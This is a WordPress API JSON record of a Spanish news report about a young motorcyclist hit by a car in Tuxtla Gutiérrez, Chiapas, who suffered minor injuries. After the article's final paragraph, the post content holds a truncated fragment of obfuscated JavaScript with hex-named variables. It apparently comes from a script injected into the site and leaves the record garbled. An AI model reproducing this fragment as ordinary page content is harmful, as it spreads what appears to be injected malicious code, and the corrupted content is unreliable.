{"id":10280,"date":"2023-05-31T02:21:51","date_gmt":"2023-05-31T02:21:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10280"},"modified":"2023-05-31T02:21:51","modified_gmt":"2023-05-31T02:21:51","slug":"atropellan-a-motociclista-a-la-altura-del-panteon-municipal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10280","title":{"rendered":"Atropellan a motociclista a la altura del Pante\u00f3n municipal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"904\" height=\"700\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685499678890.jpg\" alt=\"\" class=\"wp-image-10281\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685499678890.jpg 904w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685499678890-300x232.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685499678890-768x595.jpg 768w\" sizes=\"auto, (max-width: 904px) 100vw, 904px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 30 de mayo del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista result\u00f3 herido luego de ser atropellado en la zona Oriente de Tuxtla Guti\u00e9rrez, este martes al mediod\u00eda.<\/p>\n\n\n\n<p>Este hecho ocurri\u00f3 cuando el joven motociclista se encontraba esperando el sem\u00e1foro a la altura de la 9a Sur y 8a Oriente cuando fue impactado por un Chevrolet Matiz de color blanco que circulaba en el sentido de Poniente a Oriente y que gir\u00f3 a su izquierda.<\/p>\n\n\n\n<p>Por esta maniobra el motociclista de 23 a\u00f1os dijo que no pudo hacer nada para esquivar la unidad.<\/p>\n\n\n\n<p>El hombre junto con la moto salieron volando junto con la moto Italika de color rojo y quedaron sobre la cinta rodante.<\/p>\n\n\n\n<p>Fueron los mismos transe\u00fantes los que, ayudaron al herido a moverse a un lugar seguro.<\/p>\n\n\n\n<p>Los param\u00e9dicos valoraron al joven que result\u00f3 con heridas menores.<\/p>\n\n\n\n<p>Finalmente los involucrados llegaron a un acuerdo mediante una aseguradora.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 30 de mayo del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista result\u00f3 herido luego de ser atropellado en la zona Oriente de Tuxtla Guti\u00e9rrez, este martes al mediod\u00eda. Este hecho ocurri\u00f3 cuando el joven motociclista se encontraba esperando el sem\u00e1foro a la altura de la 9a Sur y 8a Oriente cuando fue &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10281,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10280","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10280"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10280\/revisions"}],"predecessor-version":[{"id":10282,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10280\/revisions\/10282"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10281"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}